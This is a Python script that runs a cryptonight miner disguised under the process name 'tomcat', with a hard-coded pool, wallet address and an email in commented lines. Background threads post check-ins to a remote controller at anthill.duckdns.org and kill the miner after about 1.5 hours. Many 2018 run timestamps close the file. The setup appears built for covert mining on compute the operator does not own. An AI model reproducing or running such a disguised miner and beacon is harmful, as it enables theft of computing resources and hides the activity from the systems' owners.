import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:18:07.906686
#2018-02-17 16:06:05.339093
#2018-02-17 17:55:08.021873
#2018-02-17 19:43:05.566525
#2018-02-17 21:30:08.023432
#2018-02-17 23:14:05.175821
#2018-02-18 01:01:02.018256
#2018-02-18 02:49:04.915407
#2018-02-18 04:38:01.401706
#2018-02-18 06:29:06.663583
#2018-02-18 08:18:04.053511
#2018-02-18 10:06:06.475782
#2018-02-18 11:52:04.814005
#2018-02-18 13:37:01.886904
#2018-02-18 15:27:01.796112
#2018-02-18 17:16:01.378530
#2018-02-18 19:04:04.041210
#2018-02-18 20:51:01.267021
#2018-02-18 22:38:06.446143
#2018-02-19 00:27:01.272971
#2018-02-19 02:11:07.115945
#2018-02-19 03:59:04.287539
#2018-02-19 05:44:04.970569
#2018-02-19 07:33:03.705739
#2018-02-19 09:23:04.942455
#2018-02-19 11:12:06.502707
#2018-02-19 13:01:07.320074
#2018-02-19 14:48:07.875600
#2018-02-19 16:36:01.891041
#2018-02-19 18:22:09.656940
#2018-02-19 20:08:05.602494
#2018-02-19 21:59:04.803326
#2018-02-19 23:44:02.146363
#2018-02-20 01:32:06.097158
#2018-02-20 03:19:08.164010
#2018-02-20 05:06:05.396791
#2018-02-20 06:49:01.336437
#2018-02-20 08:35:05.616562
#2018-02-20 10:20:07.150518
#2018-02-20 12:05:10.505937
#2018-02-20 13:52:14.277739
#2018-02-20 15:33:01.333757
#2018-02-20 17:20:11.624320
#2018-02-20 19:09:07.002675
#2018-02-20 20:58:07.969723
#2018-02-20 22:44:05.103079
#2018-02-21 00:28:05.962483
#2018-02-21 02:14:04.972188
#2018-02-21 04:02:05.905568
#2018-02-21 05:49:06.448856
#2018-02-21 07:38:07.282333
#2018-02-21 09:23:05.224961
#2018-02-21 11:12:04.287285
#2018-02-21 12:59:01.491607
#2018-02-21 14:46:10.432715
#2018-02-21 16:35:08.866029
#2018-02-21 18:25:10.164606
#2018-02-21 20:10:09.035625
#2018-02-21 21:59:06.579645
#2018-02-21 23:46:04.567480
#2018-02-22 01:35:03.970544
#2018-02-22 03:22:01.637143
#2018-02-22 05:09:07.366643
#2018-02-22 06:54:05.879640
#2018-02-22 08:43:09.202645
#2018-02-22 10:31:08.115531
#2018-02-22 12:17:07.821246
#2018-02-22 14:01:13.123952
#2018-02-22 15:48:01.755002
#2018-02-22 17:35:08.224156
#2018-02-22 19:21:01.314454
#2018-02-22 21:13:07.689573
#2018-02-22 22:58:07.129023
#2018-02-23 00:46:07.630288
#2018-02-23 02:35:06.265286
#2018-02-23 04:24:05.311400
#2018-02-23 06:10:08.032433
#2018-02-23 07:57:07.653418
#2018-02-23 10:13:06.533701
#2018-02-23 12:02:02.009790
#2018-02-23 13:50:04.497405
#2018-02-23 15:41:10.212271
#2018-02-23 17:28:04.567680
#2018-02-23 19:14:08.718337
#2018-02-23 20:59:01.666431
#2018-02-23 22:45:07.156950
#2018-02-24 00:36:04.502432
#2018-02-24 02:26:07.059636
#2018-02-24 04:16:01.279218
#2018-02-24 06:03:06.530761
#2018-02-24 07:51:03.505962
#2018-02-24 09:35:08.085546
#2018-02-24 11:28:06.646974
#2018-02-24 13:17:01.931232
#2018-02-24 15:08:06.547444
#2018-02-24 16:57:01.524705
#2018-02-24 18:46:01.429503
#2018-02-24 20:38:07.624338
#2018-02-24 22:45:07.098542
#2018-02-25 02:07:01.586290
#2018-02-25 06:02:06.335608
#2018-02-25 11:39:04.224501